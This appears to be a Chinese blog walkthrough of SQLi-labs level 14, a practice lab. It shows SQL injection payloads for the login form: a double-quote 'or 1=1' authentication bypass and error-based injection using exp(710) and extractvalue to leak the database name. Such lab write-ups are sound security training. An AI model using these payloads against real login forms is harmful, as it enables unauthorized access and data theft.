sqllab第十四关通关笔记

知识点:

  • 错误注入
  • 这里的语法是 where username=""
  • 直接进行双引号绕过

通过admin admin登录发现还是没有任何回显

通过bp进行抓包;测试输入内容

构造payload:username=a'+or+1=1#

发现不能成功登录

尝试换成双引号

构造payload:username=a"+or+1=1#

成功登录了

尝试进行错误注入

构造payload:username=a"+or+exp(710)#

错误成功打印到页面上了

尝试利用错误注入获取数据库名

构造payload:username=a"+or+extractvalue(1,concat(0x7e,database(),0x7e))#

成功获取了数据库名

到这里就结束了,利用错误注入获取数据库中其他敏感信息在最开始的几关实验过了

10

相关推荐
He BianGu1 小时前
【笔记】介绍 WPF XAML 中 Binding 的 StringFormat详细功能
笔记·wpf
Rousson2 小时前
硬件学习笔记--78 MCU复位电路简介
笔记·学习
~无忧花开~3 小时前
JavaScript学习笔记(十七):ES6生成器函数详解
开发语言·前端·javascript·笔记·学习·es6·js
optimistic_chen4 小时前
【Java EE进阶 --- SpringBoot】Mybatis操作数据库(基础)
数据库·经验分享·spring boot·笔记·spring·java-ee·mybatis
ASKED_20194 小时前
ChatGPT From Zero To Hero - LLM学习笔记(一)
笔记·学习·chatgpt
GoldenaArcher4 小时前
Postman 学习笔记 III:CLI 自动化测试与 Jenkins CI/CD 实践
笔记·学习·postman
一只小风华~5 小时前
命名视图学习笔记
前端·javascript·vue.js·笔记·学习
(●—●)橘子……5 小时前
记力扣2271.毯子覆盖的最多白色砖块数 练习理解
数据结构·笔记·python·学习·算法·leetcode
聪明的笨猪猪7 小时前
Spring Boot & Spring Cloud高频面试清单(含通俗理解+生活案例)
java·经验分享·笔记·面试
聪明的笨猪猪7 小时前
Spring MVC高频面试清单(含通俗理解+生活案例)
java·经验分享·笔记·面试